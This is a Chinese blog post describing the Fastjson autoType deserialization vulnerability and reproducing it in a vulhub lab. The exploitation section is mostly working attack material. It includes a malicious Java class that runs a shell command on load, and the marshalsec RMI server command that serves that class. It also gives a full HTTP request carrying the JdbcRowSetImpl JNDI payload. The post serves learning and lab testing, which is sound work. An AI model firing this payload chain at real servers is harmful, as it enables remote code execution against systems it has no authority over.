Fastjson 远程命令执⾏漏洞

最新推荐文章于 2024-08-09 07:15:00 发布
最新推荐文章于 2024-08-09 07:15:00 发布
阅读量2.1k 收藏
点赞数
分类专栏: 学海无涯 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/122341790
版权

什么是 Fastjson Fastjson

是阿⾥开发的⼀款专门⽤于Java开发的包,可以⽅便的实现 json 对象与 JavaBean 对象的转换,JavaBean 对象与 json 字 符串的转换, json 对象与 json 字符串的转换。

API 使⽤

//序列化
String text = JSON.toJSONString(obj);
//反序列化
VO vo = JSON.parse(); //解析为JSONObject类型或者JSONArray类型
VO vo = JSON.parseObject("{...}"); //JSON⽂本解析成JSONObject类型
VO vo = JSON.parseObject("{...}", VO.class); //JSON⽂本解析成VO.class类

漏洞原理

使⽤ Fastjson 的 API parseObject() 反序列化 json 字符串时,可以在字符串中加上 @type 属性。
1. 该属性会指定我们的 json 字符串将会反序列化到哪个类。
2. 服务端会解析这个类,提取出这个类中符合要求的setter⽅法与getter⽅法。
3. 如果传⼊json字符串的键值中存在这个值(如xxx),就会去调⽤执⾏对应的setter、getter⽅法(即setxxx⽅法、getxxx⽅法)
在可以调⽤任意类的情况下,如果setter、getter⽅法中存在可以利⽤的情况,就会导致任意命令执⾏。


漏洞利⽤

JNDI 注⼊利⽤原理

{"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://localhost:1099/POC",
"autoCommit":true
}

原理是 com.sun.rowset.JdbcRowSetImpl 这个类在设置 autoCommit 的 setter 时会调⽤ connect ⽅法去连接 dataSourceName 指定 的 jdbc 服务。

利⽤流程
1. ⿊客使⽤payload攻击主机A(该payload需要指定rmi/ldap地址)。
2. 主机A引发反序列化漏洞,发送了进⾏rmi远程发放调⽤,去连接主机C。
3. 主机C的rmi服务指定加载主机B的恶意java类,所以主机A通过主机C的rmi服务最终加载并执⾏主机B的恶意java类。
4. 主机A引发恶意系统命令执⾏。

复现流程
主机 A:1.1.1.1:8090
主机 B:1.1.1.1:80
主机 C:1.1.1.1:9999
主机 A、B、C 实际上是同⼀台机器的不同端⼝。
主机 A,Fastjson 漏洞环境,这⾥使⽤的是 vulhub 环境。

主机 B,放置恶意 Java 类的服务器。
⾸先要编译并上传要执⾏的代码,具体代码如下,代码⽂件名为 Exploit.java 。
 

import java.lang.Runtime;
import java.lang.Process;

public class Exploit {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"bash","-c","touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}

在主机 B 中使⽤ javac 命令编译 Exploit.java ⽂件,⽣成⼀个 Exploit.class ⽂件。

javac Exploit.java

在主机 B 开启⼀个 http 服务,需要能访问到 Exploit.class ⽂件。我们使⽤ python3 临时启动⼀个。

python -m http.server 80

 主机 C,开启 RMI 服务。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://1.1.1.1:80/#Exploit" 9999

服务全部准备就绪,下⼀步要向主机 A 发送 payload 了。

POST / HTTP/1.1
Host:192.168.112.129:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 172
{
"naraku":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.112.129:9999/Exploit",
"autoCommit":true
}
}

 主机 A 收到 payload 之后,触发了反序列化漏洞,⾸先向 RMI 服务器发送请求。

然后 RMI ⼜去请求 Exploit.class ⽂件。

 

最终触发漏洞,成功执⾏了恶意命令。 

 

 

 

时光凉春衫薄
关注
专栏目录
FastJson远程命令漏洞
PassionNingG的博客
09-03 1395
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类行代码。笔记只做学习记录分享。文章内容多来于如有侵权立删。# FastJson远程命令漏洞学习笔记fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
FastJson远程命令漏洞学习笔记
m0_73257876的博客
09-04 706
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类行代码。笔记只做学习记录分享。如有错误,请大家批评指正!
Fastjson远程命令漏洞总结
weixin_52501704的博客
07-27 1124
将json字符串转化为json对象在net.sf.json中是这么做的//将json字符串转换为json对象在fastjson中是这么做的//将json字符串转换为json对象// Reference需要传入三个参数(className,factory,factoryLocation)// 第一个参数随意填写即可,第二个参数填写我们http服务下的类名,第三个参数填写我们的远程地址// ReferenceWrapper包裹Reference类,使其能够通过RMI进行远程访问。
Fastjson库的使用与性能优化
最新发布
省赚客开发者博客
08-09 741
涵盖了JSON的序列化和反序列化,性能优化配置,以及安全性考虑。通过合理配置和使用Fastjson,可以提高Java应用的数据处理效率和安全性。虽然Fastjson以其高性能受到青睐,但也可以对比其他库如Gson、Jackson等,以满足不同场景的需求。Fastjson是阿里巴巴开源的Java JSON处理库,用于序列化和反序列化Java对象与JSON数据之间的转换。配置序列化的特性,这可以帮助优化序列化性能。大家好,我是微赚淘客系统3.0的小编,是个冬天不穿秋裤,天冷也要风度的程序猿!
Fastjson 1.2.47 远程命令漏洞
EC_Carrot的博客
06-02 145
漏洞背景 Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功行任意命令漏洞复现 编译java文件为class(详细可以参考我的这篇文章) import java.lang.Runtime; import java.lang.Process; public class TouchFile { s
fastjson 1.2.47 远程命令漏洞
weixin_42786460的博客
10-14 543
fastjson 1.2.47 远程命令漏洞
fastJSON文档
08-07
fastjson类库相关文档(fastjson文档)
Fastjson介绍
热门推荐
wutongyu344的专栏
03-05 3万+
简介 Fastjson是一个Java语言编写的高性能功能完善的JSON库。 高性能 fastjson采用独创的算法,将parse的速度提升到极致,超过所有json库,包括曾经号称最快的jackson。并且还超越了google的二进制协议protocol buf。 支持标准 Fastjson完全支持http://json.org的标准,也是官方网站收录的参考实现之一
Fastjson命令漏洞复现(1.2.47和1.2.24)
xiaobai_20190815的博客
04-12 1207
一、漏洞描述 fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链 二、影响版本 fastjson <=1.2.48(autoType为关闭状态也可使用) 三、漏洞利用 1、docker 拉取镜像,靶机一键起环境 docker-compose up -d 2、本机编辑恶意java文件,用于反弹shell,监听端口为1234,并编译javac Exploit.j
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 3315
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
fastJson
weixin_43400432的博客
08-04 456
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。导入依赖fastjsonx.x.x输出结果为:[{“AGE”:15,},{“AGE”:20,}]还可以自定义输出,并控制字段的排序,日期显示格式,序列化标记等。以上代码列出了基本参数类别,并使用了@JSONField注解,以便实现自定义转换。format 参数用于格式化date属性。...
Fastjson
zj57356498318的博客
09-25 320
Fastjson 简介 Fastjson是阿里开源的JSON处理工具 Fastjson包括序列号和反序列化两部分,有以下优点 速度最快,测试表明,fastjson具有极快的性能,自称最开的jackson 功能强大,完全支持javabean、集合、Map、日期、Enum、支持范型、支持自省 无依赖,能够直接运行在Java 5以上版本 支持Android 开源 使用 maven引入 ...
FastJson
weixin_46061449的博客
07-30 328
FastJson的一些用法,Json转换为对象,对象转换为Json。
FastJson--阿里巴巴公司开源的速度最快的Json和对象转换工具
On my way
07-07 624
这是关于FastJson的一个使用Demo,在Java环境下验证的 class User{ private int id; private String name; public int getId() { return id; } public void setId(int id) { this.id = id;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值